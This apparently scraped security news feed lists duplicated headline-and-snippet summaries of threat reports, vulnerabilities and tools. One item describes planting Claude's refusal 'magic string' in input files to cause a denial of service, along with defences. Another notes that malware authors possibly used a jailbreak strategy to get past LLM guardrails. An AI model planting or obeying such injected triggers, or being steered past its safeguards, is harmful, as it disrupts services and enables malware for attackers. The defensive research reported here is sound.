How we created a blind signatures model to anonymize user API requests
https://wardblog.substack.com/p/technical-post-how-we-created-a-blind:
1. If you’re architecting a new service, think strongly about the privacy guarantees you make to users and whether you can pursue a blind signatures model.
2. We’re exploring methods such as OHTTP Relays using Cloudflare or Fastly that also will make our backend blind to the user’s network request by routing through a managed proxy service.
3. We have an exciting announcement coming soon regarding a solution that scans other Chrome extensions for detailed threats, natively integrated into the Ward platform.
@secharvester
https://wardblog.substack.com/p/technical-post-how-we-created-a-blind:
1. If you’re architecting a new service, think strongly about the privacy guarantees you make to users and whether you can pursue a blind signatures model.
2. We’re exploring methods such as OHTTP Relays using Cloudflare or Fastly that also will make our backend blind to the user’s network request by routing through a managed proxy service.
3. We have an exciting announcement coming soon regarding a solution that scans other Chrome extensions for detailed threats, natively integrated into the Ward platform.
@secharvester
frida-ipa-extract
https://github.com/lautarovculic/frida-ipa-extract:
1. Extract a decrypted .ipa from a jailbroken iOS device using Frida.
2. Install dependencies: Arguments: If you do not pass -f or --pid, the tool attaches to a running app.
3. If no target is provided, it will list running apps and prompt you to choose.
@secharvester
https://github.com/lautarovculic/frida-ipa-extract:
1. Extract a decrypted .ipa from a jailbroken iOS device using Frida.
2. Install dependencies: Arguments: If you do not pass -f or --pid, the tool attaches to a running app.
3. If no target is provided, it will list running apps and prompt you to choose.
@secharvester
What threats are targeting European banking in January 2026?
https://threatlandscape.io/blog/active-emerging-threats-targeting-european-banking-january-2026:
1. Current threat intelligence indicates a significant surge in sophisticated, operator-driven mobile banking trojans and industrialized phishing ecosystems specifically targeting European financial institutions.
2. Current threat intelligence indicates a significant surge in sophisticated, operator-driven mobile banking trojans and industrialized phishing ecosystems specifically targeting European financial institutions.
3. Infrastructure Abuse: Threat actors are increasingly using legitimate services like AWS X-Ray for covert C2 and signed UEFI shells to achieve bootkit survival, ensuring long-term access to compromised financial workstations.
@secharvester
https://threatlandscape.io/blog/active-emerging-threats-targeting-european-banking-january-2026:
1. Current threat intelligence indicates a significant surge in sophisticated, operator-driven mobile banking trojans and industrialized phishing ecosystems specifically targeting European financial institutions.
2. Current threat intelligence indicates a significant surge in sophisticated, operator-driven mobile banking trojans and industrialized phishing ecosystems specifically targeting European financial institutions.
3. Infrastructure Abuse: Threat actors are increasingly using legitimate services like AWS X-Ray for covert C2 and signed UEFI shells to achieve bootkit survival, ensuring long-term access to compromised financial workstations.
@secharvester
Billion-Dollar Bait & Switch: Exploiting a Race Condition in Blockchain Infrastructure
https://mavlevin.com/2026/01/18/flashbots-mev-relay-race-condition-vulnerability:
1. I found a “digital sleight of hand” vulnerability, a race condition hidden in the milliseconds between database calls.
2. This blog post builds the technical background to understand the vulnerability, followed by my personal account finding and reporting the bug in 2023.
3. I carefully tracked the control flow from an attacker’s request through the lowest level of execution, following the memory moving between structs and functions.
@secharvester
https://mavlevin.com/2026/01/18/flashbots-mev-relay-race-condition-vulnerability:
1. I found a “digital sleight of hand” vulnerability, a race condition hidden in the milliseconds between database calls.
2. This blog post builds the technical background to understand the vulnerability, followed by my personal account finding and reporting the bug in 2023.
3. I carefully tracked the control flow from an attacker’s request through the lowest level of execution, following the memory moving between structs and functions.
@secharvester
Google Meet Reactions: Reverse Engineering the WebRTC Channel for Emoji
https://www.agilesoftwaredevelopment.com/en/posts/google-meet-reactions-webrtc/:
1. But Google Meet is heavily obfuscated with class names like .b1bzTb or .VfPpkd-rymPhb, and hunting for the full emoji list in popup depths didn’t seem like a great idea.
2. Then I opened chrome://webrtc-internals during a call and spotted something interesting: among dozens of RTCDataChannels, there’s one named “reactions” — and it turns out emoji are sent through it.
3. If the meeting is created from a personal Gmail account, only the standard 9 emoji are available and the extension doesn’t add much value.
@secharvester
https://www.agilesoftwaredevelopment.com/en/posts/google-meet-reactions-webrtc/:
1. But Google Meet is heavily obfuscated with class names like .b1bzTb or .VfPpkd-rymPhb, and hunting for the full emoji list in popup depths didn’t seem like a great idea.
2. Then I opened chrome://webrtc-internals during a call and spotted something interesting: among dozens of RTCDataChannels, there’s one named “reactions” — and it turns out emoji are sent through it.
3. If the meeting is created from a personal Gmail account, only the standard 9 emoji are available and the extension doesn’t add much value.
@secharvester
Kimwolf Botnet Lurking in Corporate, Govt. Networks
https://krebsonsecurity.com/2026/01/kimwolf-botnet-lurking-in-corporate-govt-networks/:
1. A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic.
2. The malware that turns one’s Internet connection into a proxy node is often quietly bundled with various mobile apps and games, and it typically forces the infected device to relay malicious and abusive traffic — including ad fraud, account takeover attempts, and mass content-scraping.
3. Next week, we’ll shed light on the myriad China-based individuals and companies connected to the Badbox 2.0 botnet, the collective name given to a vast number of Android TV streaming box models that ship with no discernible security or authentication built-in, a...
@secharvester
https://krebsonsecurity.com/2026/01/kimwolf-botnet-lurking-in-corporate-govt-networks/:
1. A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic.
2. The malware that turns one’s Internet connection into a proxy node is often quietly bundled with various mobile apps and games, and it typically forces the infected device to relay malicious and abusive traffic — including ad fraud, account takeover attempts, and mass content-scraping.
3. Next week, we’ll shed light on the myriad China-based individuals and companies connected to the Badbox 2.0 botnet, the collective name given to a vast number of Android TV streaming box models that ship with no discernible security or authentication built-in, a...
@secharvester
This open-source Windows XP alternative finally gets a much-awaited speed boost
https://www.xda-developers.com/open-source-windows-alternative-gets-the-much-awaited-speed-boost/:
1. You can go back to an old version of Windows, preferably one that still supports the ESU program, to keep your PC immune to changes Microsoft is making.
2. In his recent review of ReactOS, our Lead Windows Editor, João Carrasqueira, while acknowledging that the open-source alternative has been getting better every year, shared his experience about how it's still not good enough for something as simple as web browsing.
3. We haven't tested it, but the official X handle of ReactOS has claimed "substantial performance improvements" in networking apps after the latest code-merger.
@secharvester
https://www.xda-developers.com/open-source-windows-alternative-gets-the-much-awaited-speed-boost/:
1. You can go back to an old version of Windows, preferably one that still supports the ESU program, to keep your PC immune to changes Microsoft is making.
2. In his recent review of ReactOS, our Lead Windows Editor, João Carrasqueira, while acknowledging that the open-source alternative has been getting better every year, shared his experience about how it's still not good enough for something as simple as web browsing.
3. We haven't tested it, but the official X handle of ReactOS has claimed "substantial performance improvements" in networking apps after the latest code-merger.
@secharvester
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun - Check Point Research
https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/:
1. Employing technologies like eBPF and LKM rootkits and dedicated modules for cloud enumeration and post-exploitation in container environments, this unusual piece of malware seemed to be a larger development effort by an advanced actor.
2. It remains unclear whether this approach was purely pragmatic, intended to make the process more efficient, or a deliberate “jailbreak” strategy to navigate guardrails early and enable full end-to-end malware development later.
3. Written in Chinese and saved as Markdown (MD) files, the documentation bears all the hallmarks of a Large Language Model (LLM): highly structured, consistently formatted, and exceptionally detailed.
@secharvester
https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/:
1. Employing technologies like eBPF and LKM rootkits and dedicated modules for cloud enumeration and post-exploitation in container environments, this unusual piece of malware seemed to be a larger development effort by an advanced actor.
2. It remains unclear whether this approach was purely pragmatic, intended to make the process more efficient, or a deliberate “jailbreak” strategy to navigate guardrails early and enable full end-to-end malware development later.
3. Written in Chinese and saved as Markdown (MD) files, the documentation bears all the hallmarks of a Large Language Model (LLM): highly structured, consistently formatted, and exceptionally detailed.
@secharvester
Fake PNB MetLife payment pages abusing UPI & Telegram bots
https://malwr-analysis.com/2026/01/21/fake-pnb-metlife-payment-gateway-page-stealing-customer-details-and-redirecting-victims-to-upi-payments/:
1. Overview While actively hunting for phishing site, I came across multiple web pages impersonating PNB MetLife Insurance and presenting themselves as official policy premium payment gateways.
2. Clicking these buttons triggers JavaScript that silently copies the attacker controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.
3. URLScan analysis shows multiple deployments of the same phishing kit, with identical client-side JavaScript logic and minor configuration changes such as UPI IDs, Telegram bots, and subdomain names.
@secharvester
https://malwr-analysis.com/2026/01/21/fake-pnb-metlife-payment-gateway-page-stealing-customer-details-and-redirecting-victims-to-upi-payments/:
1. Overview While actively hunting for phishing site, I came across multiple web pages impersonating PNB MetLife Insurance and presenting themselves as official policy premium payment gateways.
2. Clicking these buttons triggers JavaScript that silently copies the attacker controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.
3. URLScan analysis shows multiple deployments of the same phishing kit, with identical client-side JavaScript logic and minor configuration changes such as UPI IDs, Telegram bots, and subdomain names.
@secharvester
AI Supercharges Attacks in Cybercrime's New 'Fifth Wave'
https://www.infosecurity-magazine.com/news/ai-supercharges-attacks-cybercrime/:
1. In its latest report, published on January 20, the Singapore-based cybersecurity firm divided the history of cybercrime in four phases, from the opportunistic malware and viruses of the 1990s and early 2000s to “ecosystem and supply chain attacks” wave that marked the 2010s and 2020s.
2. Finally, Group-IB analysts also found that threat actors are moving past chatbot misuse and are creating proprietary “dark large language models” (LLMs) that are more stable, capable and have no ethical restrictions.
3. From early experiments of rudimentary, open-access dark LLMs like WormGPT, these tools have now evolved into custom-built, self-hosted AI models optimized for generating harmful content, including malware, scams and disinformation.
@secharvester
https://www.infosecurity-magazine.com/news/ai-supercharges-attacks-cybercrime/:
1. In its latest report, published on January 20, the Singapore-based cybersecurity firm divided the history of cybercrime in four phases, from the opportunistic malware and viruses of the 1990s and early 2000s to “ecosystem and supply chain attacks” wave that marked the 2010s and 2020s.
2. Finally, Group-IB analysts also found that threat actors are moving past chatbot misuse and are creating proprietary “dark large language models” (LLMs) that are more stable, capable and have no ethical restrictions.
3. From early experiments of rudimentary, open-access dark LLMs like WormGPT, these tools have now evolved into custom-built, self-hosted AI models optimized for generating harmful content, including malware, scams and disinformation.
@secharvester
Forwarded from Хакер — Xakep.RU
Встреча читателей «Хакера» пройдет в Алматы 29 января
29 января 2026 года в 19:00 состоится встреча читателей «Хакера» в Алматы, приуроченная к разблокировке Xakep.ru на территории Казахстана. На офлайн встрече выступит главный редактор «Хакера», а также двое спикеров из хакерспейса Black Ice.
https://xakep.ru/2026/01/21/almaty-meetup-jan/
29 января 2026 года в 19:00 состоится встреча читателей «Хакера» в Алматы, приуроченная к разблокировке Xakep.ru на территории Казахстана. На офлайн встрече выступит главный редактор «Хакера», а также двое спикеров из хакерспейса Black Ice.
https://xakep.ru/2026/01/21/almaty-meetup-jan/
Infostealers are being used to create legitimate samples resembling a full blown data breach, resulting in a PR nightmare for companies
https://www.infostealers.com/article/pccomponentes-breach-how-infostealer-logs-enable-convincing-credential-stuffing/:
1. Home » Articles » Pccomponentes “Breach”: How Infostealer Logs Enable Convincing Credential Stuffing A recent cybersecurity incident involving the major Spanish electronics retailer, Pccomponentes, highlights a growing trend in the cybercrime ecosystem: the weaponization of Infostealer logs to stage convincing “fake breaches” that cause massive PR headaches.
2. The provided sample contained legitimate, sensitive customer information, which naturally led to widespread concern among users and media outlets.
3. Note that while we have blurred the specific PII, the variety of data exposed is critical: This incident serves as a stark reminder that threat actors do not need to exploit zer...
@secharvester
https://www.infostealers.com/article/pccomponentes-breach-how-infostealer-logs-enable-convincing-credential-stuffing/:
1. Home » Articles » Pccomponentes “Breach”: How Infostealer Logs Enable Convincing Credential Stuffing A recent cybersecurity incident involving the major Spanish electronics retailer, Pccomponentes, highlights a growing trend in the cybercrime ecosystem: the weaponization of Infostealer logs to stage convincing “fake breaches” that cause massive PR headaches.
2. The provided sample contained legitimate, sensitive customer information, which naturally led to widespread concern among users and media outlets.
3. Note that while we have blurred the specific PII, the variety of data exposed is critical: This incident serves as a stark reminder that threat actors do not need to exploit zer...
@secharvester
Break LLM Workflows with Claude's Refusal Magic String
https://hackingthe.cloud/ai-llm/exploitation/claude_magic_string_denial_of_service/:
1. Article by Nick Frichette Original Research Additional Resources Anthropic documents a "magic string" that intentionally triggers a streaming refusal.
2. To see this in action, we can place the magic string in a file that Claude will consume and watch it immediately bail out: This behavior creates a low-cost denial of service on any Claude-backed feature that does not robustly handle refusals or context resets.
3. Treat it like any other injection trigger: defend the input surface, handle refusals explicitly, and reset poisoned context so a single string can't become a persistent denial of service.
@secharvester
https://hackingthe.cloud/ai-llm/exploitation/claude_magic_string_denial_of_service/:
1. Article by Nick Frichette Original Research Additional Resources Anthropic documents a "magic string" that intentionally triggers a streaming refusal.
2. To see this in action, we can place the magic string in a file that Claude will consume and watch it immediately bail out: This behavior creates a low-cost denial of service on any Claude-backed feature that does not robustly handle refusals or context resets.
3. Treat it like any other injection trigger: defend the input surface, handle refusals explicitly, and reset poisoned context so a single string can't become a persistent denial of service.
@secharvester
Mirage - Is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents
https://github.com/DedInc/mirage:
1. Is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents There was an error while loading.
2. Mirage is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents.
3. Is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents There was an error while loading.
@secharvester
https://github.com/DedInc/mirage:
1. Is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents There was an error while loading.
2. Mirage is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents.
3. Is an experimental obfuscator that makes your Java bytecode harder to reverse engineer by replacing direct method calls and field accesses with reflection-based equivalents There was an error while loading.
@secharvester
You Got Phished? Of Course! You're Human...
https://www.bleepingcomputer.com/news/security/you-got-phished-of-course-youre-human/:
1. Credential-stealing Chrome extensions target enterprise HR platforms Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs Jordanian pleads guilty to selling access to 50 corporate networks Ingram Micro says ransomware attack affected 42,000 people Fortinet admins report patched FortiGate firewalls getting hacked Fake Lastpass emails pose as password vault backup alerts Microsoft shares workaround for Outlook freezes after Windows update You Got Phished?
2. Flare researchers analyzed 8,627 underground and semi-underground conversations that showed how phishing has evolved into a mature service economy, where attackers no longer rely on crude fake pages or luck.
3. These AI capabilities allow attackers to automatically generate tailored lures, adapt in real time to victim responses, and mi...
@secharvester
https://www.bleepingcomputer.com/news/security/you-got-phished-of-course-youre-human/:
1. Credential-stealing Chrome extensions target enterprise HR platforms Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs Jordanian pleads guilty to selling access to 50 corporate networks Ingram Micro says ransomware attack affected 42,000 people Fortinet admins report patched FortiGate firewalls getting hacked Fake Lastpass emails pose as password vault backup alerts Microsoft shares workaround for Outlook freezes after Windows update You Got Phished?
2. Flare researchers analyzed 8,627 underground and semi-underground conversations that showed how phishing has evolved into a mature service economy, where attackers no longer rely on crude fake pages or luck.
3. These AI capabilities allow attackers to automatically generate tailored lures, adapt in real time to victim responses, and mi...
@secharvester
capa in the browser - fully local static analysis to detect binary capabilities and behaviors
https://surfactant.readthedocs.io/en/latest/capa/:
1. Run capa purely in your browser using Pyodide (WebAssembly).
2. Supports PE, ELF, .NET modules, and shellcode (x86/x64 only) Analyzing program...
3. The archive contains multiple files.
@secharvester
https://surfactant.readthedocs.io/en/latest/capa/:
1. Run capa purely in your browser using Pyodide (WebAssembly).
2. Supports PE, ELF, .NET modules, and shellcode (x86/x64 only) Analyzing program...
3. The archive contains multiple files.
@secharvester
Fortinet admins report patched FortiGate firewalls getting hacked
https://www.bleepingcomputer.com/news/security/fortinet-admins-report-patched-fortigate-firewalls-getting-hacked/:
1. Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.
2. CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.
3. Register Now Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs Ingram Micro says ransomware attack affected 42,000 people New PDFSider Windows malware deployed on Fortune 100 firm's network Identity Governance & Threat Detection in one: Get a guided tour of our platform Discover how to scale IT infrastructure reliably without adding toil or burnout.
@secharvester
https://www.bleepingcomputer.com/news/security/fortinet-admins-report-patched-fortigate-firewalls-getting-hacked/:
1. Until Fortinet provides a fully patched FortiOS release, admins are advised to temporarily disable the vulnerable FortiCloud login feature (if enabled) to secure their systems against attacks.
2. CISA has also added the CVE-2025-59718 FortiCloud SSO auth bypass flaw to its list of actively exploited vulnerabilities, ordering federal agencies to patch within a week.
3. Register Now Microsoft releases OOB Windows updates to fix shutdown, Cloud PC bugs Ingram Micro says ransomware attack affected 42,000 people New PDFSider Windows malware deployed on Fortune 100 firm's network Identity Governance & Threat Detection in one: Get a guided tour of our platform Discover how to scale IT infrastructure reliably without adding toil or burnout.
@secharvester
🔥1
Third-party identity verification provider breach exposes government ID images (Total Wireless / Veriff)
https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/d711bedf-6bbc-45cc-b333-62e961653bd7.html:
1. > Consumer Information > Privacy, Identity Theft and Data Security Breaches > Data Breach Notifications
2. Copyright © 2014 All rights reserved.
3. If content on this page is inaccessible and you would like to request the information in a different format, please contact (207) 626-8800 and it will be provided to you.
@secharvester
https://www.maine.gov/agviewer/content/ag/985235c7-cb95-4be2-8792-a1252b4f8318/d711bedf-6bbc-45cc-b333-62e961653bd7.html:
1. > Consumer Information > Privacy, Identity Theft and Data Security Breaches > Data Breach Notifications
2. Copyright © 2014 All rights reserved.
3. If content on this page is inaccessible and you would like to request the information in a different format, please contact (207) 626-8800 and it will be provided to you.
@secharvester
Attackers With Decompilers Strike Again (SmarterTools SmarterMail WT-2026-0001 Auth Bypass) - watchTowr Labs
https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/:
1. You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
2. We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
3. Within the release notes, you’ll see a clear, succinct, and well-communicated emergency message (possibly in red, but we’re colour blind, so we’re not sure): We did not plan to publish this blog post today - Wednesdays are meme days - but that changed when an ano...
@secharvester
https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/:
1. You may recall that merely two weeks ago, we analyzed CVE-2025-52691 - a pre-auth RCE vulnerability in the SmarterTools SmarterMail email solution with a timeline that is typically reserved for KEV hall-of-famers.
2. We decided to continue poking at what looked like a fairly interesting solution and quickly stumbled into WT-2026-0001 - an Authentication Bypass vulnerability, allowing any user to reset the SmarterMail system administrator password.
3. Within the release notes, you’ll see a clear, succinct, and well-communicated emergency message (possibly in red, but we’re colour blind, so we’re not sure): We did not plan to publish this blog post today - Wednesdays are meme days - but that changed when an ano...
@secharvester
🔥1
Resurgence of a multi‑stage AiTM phishing and BEC campaign abusing SharePoint | Microsoft Security Blog
https://aka.ms/aitm-bec:
1. The campaign abused SharePoint file‑sharing services to deliver phishing payloads and relied on inbox rule creation to maintain persistence and evade user awareness.
2. To further protect themselves from similar attacks, organizations should also consider complementing MFA with conditional access policies, where sign-in requests are evaluated using additional identity-driven signals like user or group membership, IP location information, and device status, among others.
3. Additionally, even if the compromised user’s password is reset and sessions are revoked, the attacker can set up persistence methods to sign-in in a controlled manner by tampering with MFA.
@secharvester
https://aka.ms/aitm-bec:
1. The campaign abused SharePoint file‑sharing services to deliver phishing payloads and relied on inbox rule creation to maintain persistence and evade user awareness.
2. To further protect themselves from similar attacks, organizations should also consider complementing MFA with conditional access policies, where sign-in requests are evaluated using additional identity-driven signals like user or group membership, IP location information, and device status, among others.
3. Additionally, even if the compromised user’s password is reset and sessions are revoked, the attacker can set up persistence methods to sign-in in a controlled manner by tampering with MFA.
@secharvester